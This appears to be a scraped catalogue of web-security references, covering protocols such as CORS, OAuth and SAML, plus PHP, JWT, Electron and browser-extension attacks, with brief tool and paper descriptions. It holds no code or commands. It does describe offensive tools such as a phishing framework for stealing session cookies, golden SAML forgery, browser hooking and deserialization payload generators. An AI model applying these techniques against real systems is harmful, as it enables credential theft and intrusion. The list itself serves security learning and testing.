- Content Security Policy (CSP)
- Cross-Origin Resource Sharing (CORS)
- Document Object Model (DOM)
- HTML
- Hypertext Transfer Protocol (HTTP)
- OAuth
- Robots.txt
- Same-Origin-Policy
- Security Assertion Markup Language (SAML)
- Service Workers
- Subresource Integrity
- Uniform Resource Identifier/Locator (URIs/URLs)
- Web Authentication
- WebBluetooth
- Web Hooks
- WebNFC
- WebRTC
- WebSockets
- WebUSB
- APIs
- Browser Security
- SSL/TLS
- CMS Specific Tools
- Cold Fusion
- Continuous Integration/Build Systems
- Electron
- Flash/SWF
- JavaScript
- Java Server Faces
- Java Server Pages
- JSON Web Tokens
- MIME Sniffing
- NodeJS
- PASETO
- PHP
- REST & Web Services
- Ruby
- Single Sign-On
- Web Application Firewalls (WAFs)
- WebAssembly
- Web Frameworks
- Web Proxies
- Web Servers
- Abuse of Functionality
- Brute Force Fuzzing
- Attacking Continuous Integration Systems
- ClickJacking
- Cross-Protocol Request
- Cross-Site History Manipulation (XSHM)
- Cross-Site Request Forgery
- CSV Injection
- De/Encoders
- Data Structure Attacks
- Embedded Malicious Code
- Exploitation of Authentication
- File Upload Testing
- HTML Smuggling
- HTTP Request Smuggling
- Insecure Direct Object Reference
- Injection Based Attacks
- JNDI
- Java Serialization Attacks
- LFI & RFI
- Path Traversal Attacks
- Reflected File Download
- Server Side Request Forgery
- Server Side Include
- Server Side Template Injection
- Tabnabbing
- Timing Attacks
- Typosquatting Attacks
- Web Cache Deception
- Web Shells
- XML Related
- XSS
- 101
- ASVS
- OWASP Top Ten Project
- The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
- The Website Obesity Crisis
- Video Testing stateful web application workflows - András Veres-Szentkirályi
- Paper Testing stateful web application workflows - SANS - András Veres-Szentkirályi
- Most web applications used for complex business operations and/or employing advanced GUI frameworks have stateful functionality. Certain workflows, for example, might require completing certain steps before a transaction is committed, or a request sent by a client-side UI element might need several preceding requests that all contribute to the session state. Most automated tools focus on a request and maybe a redirection, thus completely missing the point in these cases, where resending a request gets ignored by the target application. As a result, while these tools are getting better day by day, using them for testing such execution paths is usually out of the question. Since thorough assessment is cumbersome without such tools, there's progress, but we are far from plug-and-play products. This paper focuses on the capabilities of currently available solutions, demonstrating their pros and cons, along with opportunities for improvement.
- 101
- Articles/Papers/Talks/Writeups
- Tools
- Miscellaneous
- 101
- Cross-Origin Resource Sharing (CORS) - Mozilla Dev Docs
- CORS Findings: Another Way to Comprehend - Ryan Leese
- Same Origin Policy - dev.mozilla
- Same Origin Policy - W3C
- Cross-Origin Resource Sharing (CORS) - dev.mozilla
- Cross-Origin Resource Sharing - w3.org
- This document defines a mechanism to enable client-side cross-origin requests. Specifications that enable an API to make cross-origin requests to resources can use the algorithms defined by this specification. If such an API is used on http://example.org resources, a resource on http://hello-world.example can opt in using the mechanism described by this specification (e.g., specifying Access-Control-Allow-Origin: http://example.org as response header), which would allow that resource to be fetched cross-origin from http://example.org.
- Articles/Blogposts/Writeups
- Papers/Talks/Writeups
- Exploiting CORS Misconfigurations For Bitcoins And Bounties by James Kettle
- Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It's already widely understood that certain CORS configurations are dangerous. In this presentation, I'll skim over the old knowledge then coax out and share with you an array of under-appreciated but dangerous subtleties and implications buried in the CORS specification. I'll illustrate each of these with recent attacks on real websites, showing how I could have used them to steal bitcoins from two different exchanges, partially bypass Google's use of HTTPS, and requisition API keys from numerous others. I'll also show how CORS blunders can provide an invaluable link in crafting exploit chains to pivot across protocols, exploit the unexploitable via server and client-side cache poisoning, and even escalate certain open redirects into vulnerabilities that are actually notable.
- Blogpost
- Exploiting CORS Misconfigurations For Bitcoins And Bounties by James Kettle
- Tools
- CORStest
- A simple CORS misconfiguration scanner
- CORStest
- Miscellaneous
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Fetch Living Standard — 2019/7/16 - whatwg
- The Fetch standard defines requests, responses, and the process that binds them: fetching.
- 101
- RFC 2068: Hypertext Transfer Protocol -- HTTP/1.1
- RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1
- http-decision-diagram
- An activity diagram to describe the resolution of HTTP response status codes, given various headers, implemented via semantical callbacks.
- Caching
- RFC 7234: Hypertext Transfer Protocol (HTTP/1.1): Caching
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document defines HTTP caches and the associated header fields that control cache behavior or indicate cacheable response messages.
- HTTP Headers
- HTTP Methods
- HTTP Objects
- HTTP Parameters
- Syntax & Routing
- RFC 7230: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
- The Hypertext Transfer Protocol (HTTP) is a stateless application-level protocol for distributed, collaborative, hypertext information systems. This document provides an overview of HTTP architecture and its associated terminology, defines the "http" and "https" Uniform Resource Identifier (URI) schemes, defines the HTTP/1.1 message syntax and parsing requirements, and describes related security concerns for implementations.
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- MIME Sniffing - whatwg.org
- Media Type Sniffing | draft-ietf-websec-mime-sniff-03
- Many web servers supply incorrect Content-Type header fields with their HTTP responses. In order to be compatible with these servers, user agents consider the content of HTTP responses as well as the Content-Type header fields when determining the effective media type of the response. This document describes an algorithm for determining the effective media type of HTTP responses that balances security and compatibility considerations.
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- OAuth 2.0 Security Best Current Practice draft-ietf-oauth-security-topics-05 - Expires Sept 19, 2018
- This document describes best current security practices for OAuth 2.0. It updates and extends the OAuth 2.0 Security Threat Model to incorporate practical experiences gathered since OAuth 2.0 was published and cover new threats relevant due to the broader application of OAuth 2.0.
- OAuth 2.0 Dynamic Client Registration Protocol - rfc7591
- This specification defines mechanisms for dynamically registering OAuth 2.0 clients with authorization servers. Registration requests send a set of desired client metadata values to the authorization server. The resulting registration responses return a client identifier to use at the authorization server and the client metadata values registered for the client. The client can then use this registration information to communicate with the authorization server using the OAuth 2.0 protocol. This specification also defines a set of common client metadata fields and values for clients to use during registration.
- The OAuth 2.0 Authorization Framework: JWT Secured Authorization Request - ietf.org
- The authorization request in OAuth 2.0 described in RFC 6749 utilizes query parameter serialization, which means that Authorization Request parameters are encoded in the URI of the request and sent through user agents such as web browsers. While it is easy to implement, it means that (a) the communication through the user agents is not integrity protected and thus the parameters can be tainted, and (b) the source of the communication is not authenticated. Because of these weaknesses, several attacks on the protocol have now been put forward. This document introduces the ability to send request parameters in a JSON Web Token (JWT) instead, which allows the request to be signed with JSON Web Signature (JWS) and encrypted with JSON Web Encryption (JWE) so that the integrity, source authentication and confidentiality property of the Authorization Request is attained. The request can be sent by value or by reference.
- OAuth 2.0 Mutual TLS Client Authentication and Certificate Bound Access Tokens - ietf
- This document describes Transport Layer Security (TLS) mutual authentication using X.509 certificates as a mechanism for OAuth client authentication to the authorization server as well as for certificate bound sender constrained access tokens as a method for a protected resource to ensure that an access token presented to it by a given client was issued to that client by the authorization server.
- Articles/Blogposts/Writeups
- Dancing with OAuth: Understanding how Authorization Works - Ashish Mathur
- Shining a Light on OAuth Abuse with PwnAuth - Douglas Bienstock
- OAUTH – Everything you wanted to know but not really! - Elaheh Samani, Kevin Watkins
- An Illustrated Guide to OAuth and OpenID Connect - David Neal
- Analysis of Common Federated Identity Protocols: OpenID Connect vs OAuth 2.0 vs SAML 2.0 - hackedu.io
- Presentations/Talks/Videos
- Attacking
- 101
- RFC 6454: The Web Origin Concept
- This document defines the concept of an "origin", which is often used as the scope of authority or privilege by user agents. Typically, user agents isolate content retrieved from different origins to prevent malicious web site operators from interfering with the operation of benign web sites. In addition to outlining the principles that underlie the concept of origin, this document details how to determine the origin of a URI and how to serialize an origin into a string. It also defines an HTTP header field, named "Origin", that indicates which origins are associated with an HTTP request.
- Same-origin policy - Mozilla
- The same-origin policy is a critical security mechanism that restricts how a document or script loaded from one origin can interact with a resource from another origin. It helps isolate potentially malicious documents, reducing possible attack vectors.
- Same-origin policy - Wikipedia
- Same-origin Policy - W3
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- With Great Power Comes Great Pwnage
- Out of Band XML External Entity Injection via SAML SSO - Sean Melia
- Web-based Single Sign-On and the Dangers of SAML XML Parsing
- Following the white Rabbit Down the SAML Code
- Evilginx - Advanced Phishing with Two-factor Authentication Bypass
- SAML All the Things! A Deep Dive into SAML SSO - Elijah A. Martin-Merrill
- Golden SAML Attack
- Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps
- shimit
- In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application. shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider, more are in the works...
- Tools
- Evilginx
- Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. Its core runs on the Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.
- SAMLReQuest Burp Suite Extension
- 101
- Service Worker - w3c
- This specification describes a method that enables applications to take advantage of persistent background processing, including hooks to enable bootstrapping of web applications while offline. The core of this system is an event-driven Web Worker, which responds to events dispatched from documents and other sources. A system for managing installation, versions, and upgrades is provided. The service worker is a generic entry point for event-driven background processing in the Web Platform that is extensible by other specifications.
- 101
- Subresource Integrity - W3.org
- Subresource Integrity - w3c.github.io
- This specification defines a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.
- Articles/Blogposts/Writeups
- Tools
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Transport Layer Security (TLS) Extensions
- Mixed content - w3c
- This specification describes how a user agent should handle fetching of content over unencrypted or unauthenticated connections in the context of an encrypted and authenticated document.
- Attacks Against
- SSL/TLS Interception Proxies and Transitive Trust
- Secure Sockets Layer (SSL) and its successor Transport Layer Security (TLS), have become key components of the modern Internet. The privacy, integrity, and authenticity provided by these protocols are critical to allowing sensitive communications to occur. Without these systems, e-commerce, online banking, and business-to-business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities. Advanced Persistent Threat (APT) attackers, botnets, and even commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end encrypted channels. Web proxies, data loss prevention (DLP) systems, specialized threat detection solutions, and network intrusion prevention systems (NIPS) offer functionality to intercept, inspect, and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as "SSL/TLS interception proxies", these solutions act as a "man-in-the-middle", violating the end-to-end security promises of SSL. This type of interception comes at a cost. Intercepting SSL-encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation. Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances.
- 101
- Streams - Dec 12 2019
- This specification provides APIs for creating, composing, and consuming streams of data that map efficiently to low-level I/O primitives.
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- 101
- Articles/Blogposts/Writeups
- 101
- 101
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- Articles/Papers/Talks/Writeups
- General
- Tools
- [WSSiP: A WebSocket Manipulation Proxy](https://github.com/nccgroup/wssip)
- Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
- Miscellaneous
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- WebUSB - How a website could steal data off your phone
- This blog post looks into the capabilities of WebUSB to understand how it works, the new attack surface, and privacy issues. We will describe the processes necessary to get access to devices and how permissions are handled in the browser. Then we will discuss some security implications and show how a website can use WebUSB to establish an ADB connection and effectively compromise a connected Android phone.
- General
- WebSocket API Standards
- White House Web API Standards
- This document provides guidelines and examples for White House Web APIs, encouraging consistency, maintainability, and best practices across applications. White House APIs aim to balance a truly RESTful API interface with a positive developer experience (DX).
- Build Simple Restful Api With Python and Flask Part 1 - Mukhammad Ginanjar Azie
- What Is OpenAPI?
- The OpenAPI Specification
- The OpenAPI Specification is a community-driven open specification within the OpenAPI Initiative, a Linux Foundation Collaborative Project. The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
- Fuzzing
- Fuzzapi
- Fuzzapi is a Rails application which uses API_Fuzzer and provides a UI for the gem.
- Automating API Penetration Testing using fuzzapi - AppSecUSA 2016
- Building One
- Securing
- OWASP API Security Project
- OWASP API Security Top 10
- API Security Checklist
- Checklist of the most important security countermeasures when designing, testing, and releasing your API
- Tools
- Postman - chrome plugin
- restclient - Firefox addon
- Astra
- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during the development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into a CI/CD pipeline. Astra can take an API collection as input, so it can also be used for testing APIs in standalone mode.
- API-fuzzer
- API Fuzzer which allows fuzzing request attributes using common pentesting techniques and lists vulnerabilities
- 101
- Articles/Blogposts/Writeups
- Papers
- Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control
- Abstract: Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
- How do we Stop Spilling the Beans Across Origins? - A primer on web attacks via cross-origin information leaks and speculative execution
- Presentations/Talks/Videos
- Browser as Botnet - Brannon Dorsey - Radical Networks 2017
- When surfing the web, browsers download and execute arbitrary JavaScript code they receive from websites they visit. What if high-traffic websites served obfuscated code that secretly borrowed clock cycles from their client’s web browser as a means of distributed computing? In this talk I present research on the topic of using web browsers as zero-configuration, trojan-less botnets. The presentation includes a brief history of botnets, followed by an overview of techniques to build and deploy command-and-control botnet clients that run in-browser.
- Tools
- Chrome Specific
- Chromium Sandbox
- Sandbox leverages the OS-provided security to allow code execution that cannot make persistent changes to the computer or access information that is confidential. The architecture and exact assurances that the sandbox provides are dependent on the operating system. This document covers the Windows implementation as well as the general design.
- Chromium Cross-Origin Read Blocking (CORB)
- Chromium Sidechannel Threat Model: Post-Spectre Threat Model Re-Think(2018)
- Security analysis of `<portal>` element - Michal Bentkowski
- Firefox Specific
- Safari Specific
- Browser Extensions
- Articles/Blogposts/Writeups
- Attacking Browser Extensions
- Botnet in the Browser: Understanding Threats Caused by Malicious Browser Extensions
- An in-depth look into Malicious Browser Extensions(2014)
- Game of Chromes: Owning the Web with Zombie Chrome Extensions - DEF CON 25 - Tomer Cohen
- Chrome-botnet
- Malware in the browser: how you might get hacked by a Chrome extension(2016) - Maxime Kjaer
- I Sold a Chrome Extension but it was a bad decision - Amit Agarwal
- Detecting Installed Extensions (Edge)(2017) - brokenbrowser.com
- Finding Browser Extensions To Hunt Evil!(2016) - Brad Antoniewicz
- Sparse Bruteforce Addon Detection(2011) - James Kettle
- Intro to Chrome addons hacking: fingerprinting(2012) - kotowicz
- No Place Like Chrome - xorrior
- Talks & Presentations
- Chrome Specific
- Firefox Specific
- Papers
- Malicious Browser Extensions at Scale: Bridging the Observability Gap between Web Site and Browser - Louis F. DeKoven, Stefan Savage, Geoffrey M. Voelker, Nektarios Leontiadis
- We present a methodology whereby users exhibiting suspicious online behaviors are scanned (with permission) to identify the set of extensions in their browser, and those extensions are in turn labelled based on the threat indicators they contain. We have employed this methodology at Facebook for six weeks, identifying more than 1700 lexically distinct malicious extensions. We use this labelling to drive user device clean-up efforts as well as to report to antimalware and browser vendors.
- Paper
- Tools
- extension_finder
- Python and PowerShell utilities for finding installed browser extensions, plug-ins and add-ons
- CSS Keylogger
- Chrome extension and Express server that exploits keylogging abilities of CSS.
- Articles/Blogposts/Writeups
- Exploiting
- Smashing The Browser: From Vulnerability Discovery To Exploit
- Goes from introducing a fuzzer to producing an IE11 0day
- The Birth of a Complete IE11 Exploit Under the New Exploit Mitigations
- BeEF Browser Exploitation Framework
- BeEF
- Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
- Browsers Gone Wild - Angelo Prado & Xiaoran Wang - BHAsia2015
- In this talk, we will demonstrate and unveil the latest developments on browser specific weaknesses including creative new mechanisms to compromise confidentiality, successfully perform login and history detection, serve mixed content, deliver malicious ghost binaries without a C&C server, exploit cache/timing side channels to extract secrets from third-party domains, and leverage new HTML5 features to carry out more stealthy attacks. This is a practical presentation with live demos that will challenge your knowledge of the Same Origin Policy and push the limits of what is possible with today's web clients.
- General
- Abusing Certificate Transparency Or How To Hack Web Applications Before Installation - Hanno Böck
- The Spy in the Sandbox – Practical Cache Attacks in Javascript
- We present the first micro-architectural side-channel attack which runs entirely in the browser. In contrast to other works in this genre, this attack does not require the attacker to install any software on the victim's machine to facilitate the attack; the victim needs only to browse to an untrusted webpage with attacker-controlled content. This makes the attack model highly scalable and extremely relevant and practical to today's web, especially since most desktop browsers currently accessing the Internet are vulnerable to this attack. Our attack, which is an extension of the last-level cache attacks of Yarom et al., allows a remote adversary to recover information belonging to other processes, other users and even other virtual machines running on the same physical host as the victim web browser. We describe the fundamentals behind our attack, evaluate its performance using a high bandwidth covert channel and finally use it to construct a system-wide mouse/network activity logger. Defending against this attack is possible, but the required countermeasures can exact an impractical cost on other benign uses of the web browser and of the computer.
- Tools
- CTFR
- Do you miss the AXFR technique? This tool allows you to get the subdomains of an HTTPS website in a few seconds. How does it work? CTFR uses neither a dictionary attack nor brute force; it just abuses Certificate Transparency logs.
- Certificate Transparency Subdomains
- An hourly updated list of subdomains gathered from certificate transparency logs. https://github.com/SSLMate/certspotter https://github.com/AnikHasibul/crtscan https://github.com/chris408/ct-exposer
- Drupal
- Drupal Security Checklist
- Drupal Attack Scripts
- Set of brute force scripts and Checklist
- Droopescan
- A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
- Uncovering Drupalgeddon 2 - Checkpoint
- Joomla
- Highly Effective Joomla Backdoor with Small Profile
- JoomScan
- Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendliness and extensibility, to name a few. So, watching its vulnerabilities and adding such vulnerabilities as KB to the Joomla scanner is an ongoing activity. It will help web developers and web masters identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated to only one CMS.
- JScanner
- Analyze target Joomla! installation using several different techniques.
- JoomlaVS
- JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic fingerprinting and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.
- Sharepoint
- Sparty - Sharepoint/Frontpage Auditing Tool
- Sparty is an open source tool written in Python to audit web applications using SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint and FrontPage based web applications. Due to the complex nature of this web administration software, a simple and efficient tool is needed that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
- WordPress
- Hacking Jenkins Servers With No Password
- Hacking Jenkins - Ideas - Zeroknock
- pwn_jenkins
- Notes about attacking Jenkins servers
- Hacking Jenkins Part 1 - Play with Dynamic Routing - Orange
- Articles
- From Markdown to RCE in Atom
- As It Stands - Electron Security - 2016
- As It Stands - Update on Electron Security - 2016
- Modern Alchemy: Turning XSS into RCE
- Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - CodeBlue16
- Modern Alchemy: Turning XSS into RCE - doyensec
- From Markdown to RCE in Atom - statuscode.ch
- Instrumenting Electron Apps for Security Testing - Paolo Stagno
- Documentation
- Papers
- Talks & Presentations
- MarkDoom: How I Hacked Every Major IDE in 2 Weeks - Matt Austin, LevelUp 2017
- Electron - Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa - [CB16]
- Electronegativity - A Study of Electron Security - Carettoni
- Electron Security Checklist - A guide for developers and auditors - Luca Carettoni
- Published Exploits
- Tools
- electron-run-shell-example
- An HTML5 stand-alone app using GitHub Electron (Chrome engine + Node.js) -- this is a GUI wrapper example that runs a bash shell command and processes its output.
- Articles/Blogposts/Writeups
- Testing for Cross-Site-Flashing - OWASP
- Security Domains, Application Domains, and More in ActionScript 3.0
- The old is new, again. CVE-2011-2461 is back!
- As a part of an ongoing investigation on Adobe Flash SOP bypass techniques, we identified a vulnerability affecting old releases of the Adobe Flex SDK compiler. Further investigation traced the issue back to a well known vulnerability (CVE-2011-2461), already patched by Adobe. Old vulnerability, let's move on? Not this time. CVE-2011-2461 is a very interesting bug. As long as the SWF file was compiled with a vulnerable Flex SDK, attackers can still use this vulnerability against the latest web browsers and Flash plugin. Even with the most recent updates, vulnerable Flex applications hosted on your domain can be exploited. In this presentation, we will disclose the details of this vulnerability (Adobe has never released all technicalities) and we will discuss how we conducted a large scale analysis on popular websites, resulting in the identification of numerous Alexa Top 50 sites vulnerable to this bug. Finally, we will also release a custom tool and a Burp plugin capable of detecting vulnerable SWF applications.
- Advanced Flash Vulnerabilities in Youtube Writeups Series
- Decode Adobe Flex AMF protocol
- Finding XSS vulnerabilities in flash files.
- XSS and CSRF via SWF Applets (SWFUpload, Plupload)
- WordPress Flash XSS in flashmediaelement.swf - cure53
- Security Domains, Application Domains, and More in ActionScript 3.0 - senocular
- Testing for Cross site flashing (OTG-CLIENT-008) - OWASP
- XSS and CSRF via SWF Applets (SWFUpload, Plupload) - Neal Poole
- Getting started with AMF Flash Application Penetration Testing ! - nerdint
- Securing
- HardenFlash
- Patching Flash binary to stop Flash exploits and zero-days
- Tools
- General
- 101
- Articles/Blogposts/Writeups
- Reverse-Engineering
- Tools
- JSFuck
- JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
- JSDetox
- JSDetox is a tool to support the manual analysis of malicious Javascript code.
- Dom Flow - Untangling The DOM For More Easy-Juicy Bugs - BH USA 2015
- Javascript Deobfuscator - kahusecurity
- Revelo - kahusecurity
- pwn.js
- A Javascript library for browser exploitation
- Retire.js
- There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies development, but we need to stay up to date on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10, and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of versions with known vulnerabilities.
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- Testing
- Tools
- json token decode
- JWT Inspector - FF plugin
- JWT Inspector is a browser extension that lets you decode and inspect JSON Web Tokens in requests, cookies, and local storage. Also debug any JWT directly from the console or in the built-in UI.
- c-jwt-cracker
- JWT4B
- JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
- Writeups
- How to configure Json.NET to create a vulnerable web API - alphabot
- 🔐 Learn how to use JSON Web Token (JWT) to secure your next Web App! (Tutorial/Example with Tests!!)
- Critical vulnerabilities in JSON Web Token libraries
- Brute Forcing HS256 is Possible: The Importance of Using Strong Keys in Signing JWTs
- Hacking JSON Web Token (JWT) - Hate_401
- JWT (JSON Web Token) (in)security - Michal Sajdak
- Practical Approaches for Testing and Breaking JWT Authentication - Mazin Ahmed
- 101
- What is MIME Sniffing? - keycdn.com
- Content Sniffing - Wikipedia
- Content sniffing, also known as media type sniffing or MIME sniffing, is the practice of inspecting the content of a byte stream to attempt to deduce the file format of the data within it.
- Articles/Blogposts/Writeups
- Exploitation of
- 101
- Educational
- A Roadmap for Node.js Security
- NodeGoat
- Being lightweight, fast, and scalable, Node.js is becoming a widely adopted platform for developing web applications. This project provides an environment to learn how OWASP Top 10 security risks apply to web applications developed using Node.js and how to effectively address them.
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- Tools
- faker.js
- generate massive amounts of fake data in Node.js and the browser
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Pwning PHP mail() function For Fun And RCE | New Exploitation Techniques And Vectors
- The unexpected dangers of preg_replace
- Imagecreatefromgif-Bypass
- A simple helper script to find byte sequences present in both of 2 given files. The main purpose of this is to find bytes that remain untouched after being processed with imagecreatefromgif() PHP function from GD-LIB. That is the place where a malicious PHP script can be inserted to achieve some nasty RCE.
- Is PHP vulnerable and under what conditions?
- Code Reuse
- 101
- Articles/Blogposts/Writeups
- Crypto
- 101
- Articles/Blogposts/Writeups
- I Forgot Your Password: Randomness Attacks Against PHP Applications - George Argyros, Aggelos Kiayias
- We provide a number of practical techniques and algorithms for exploiting randomness vulnerabilities in PHP applications. We focus on the predictability of password reset tokens and demonstrate how an attacker can take over user accounts in a web application via predicting or algorithmically derandomizing the PHP core randomness generators. While our techniques are designed for the PHP language, the principles behind our techniques and our algorithms are independent of PHP and can readily apply to any system that utilizes weak randomness generators or low entropy sources. Our results include: algorithms that reduce the entropy of time variables, identifying and exploiting vulnerabilities of the PHP system that enable the recovery or reconstruction of PRNG seeds, an experimental analysis of the Hastad-Shamir framework for breaking truncated linear variables, an optimized online Gaussian solver for large sparse linear systems, and an algorithm for recovering the state of the Mersenne twister generator from any level of truncation. We demonstrate the gravity of our attacks via a number of case studies. Specifically, we show that a number of current widely used web applications can be broken using our techniques, including Mediawiki, Joomla, Gallery, osCommerce and others.
- De/Serialization
- 101
- Articles/Blogposts/Writeups
- Writing Exploits For Exotic Bug Classes: unserialize()
- Remote code execution via PHP [Unserialize] - notsosecure
- PHP Generic Gadget Chains: Exploiting unserialize in unknown environments
- PHPGGC: PHP Generic Gadget Chains
- PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically. When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. Currently, the tool supports: Doctrine, Guzzle, Laravel, Monolog, Slim, SwiftMailer.
- File Operation Induced Unserialization via the "phar://" Stream Wrapper - secarma labs
- Pictures
- Hacking with Pictures - Syscan2015
- Exploiting PHP-GD imagecreatefromjpeg() function - fakhrizulkifli
- Proof-of-concept to exploit the flaw in the PHP-GD built-in function, imagecreatefromjpeg(). Inspired by a Reddit comment on my previous thread regarding exploiting the imagecreatefromgif() PHP-GD function.
- Property-Oriented Programming(POP)
- Code Reuse Attacks in PHP: Automated POP Chain Generation
- In this paper, we study code reuse attacks in the context of PHP-based web applications. We analyze how PHP object injection (POI) vulnerabilities can be exploited via property-oriented programming (POP) and perform a systematic analysis of available gadgets in common PHP applications. Furthermore, we introduce an automated approach to statically detect POI vulnerabilities in object-oriented PHP code. Our approach is also capable of generating POP chains in an automated way. We implemented a prototype of the proposed approach and evaluated it with 10 well-known applications. Overall, we detected 30 new POI vulnerabilities and 28 new gadget chains.
- Utilizing Code Reuse/ROP in PHP Application Exploits - BH 2010
- POP-Exploit
- Research into Property Oriented Programming about php applications.
- Bypassing Disabled Functions
- Type Juggling
- Writeups
- Php Codz Hacking
- Writeups of specific PHP vulns
- Learning/Reference
- 101
- Representational State Transfer - Wikipedia
- Microservices
- Service-Oriented-Architecture
- The S stands for Simple
- Satire (only it's not) of a conversation about SOAP
- RESTful Services, The Web Security Blind Spot
- Learn REST: A Tutorial
- REST and Stateless Session IDs
- Beginner’s Guide to API(REST) security
- Introduction to RESTful APIs with Chris Wahl
- 101
- Talks & Presentations
- Cracking and fixing REST services - Bill Sempf - Converge 2015
- REST, or Representational State Transfer, just refers to the protocol with which the whole Web works. No big. We are used to using REST with a browser, but there is more to it: we can write programs with REST. The problem is that exposing properties and functions over the web's transfer protocol opens them up to all of the security weaknesses of the web, and we know there are a few of those. Finding those bugs is just half of the battle; fixing them is a whole other story. You'll need the details, and you'll get them here.
- Attacking
- Tools
- WS-Attacker
- WS-Attacker is a modular framework for web services penetration testing. It is developed by the Chair of Network and Data Security, Ruhr University Bochum (http://nds.rub.de/ ) and the Hackmanit GmbH (http://hackmanit.de/).
- Damn Vulnerable Web Services dvws
- Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.
- WS-Attacks.org
- WS-Attacks.org is not a new web service standard by the OASIS Group or W3C; instead it presents the flaws of today's web service standards and implementations in regard to web service security! WS-Attacks.org aims at delivering the most comprehensive enumeration of all known web service attacks.
- Astra
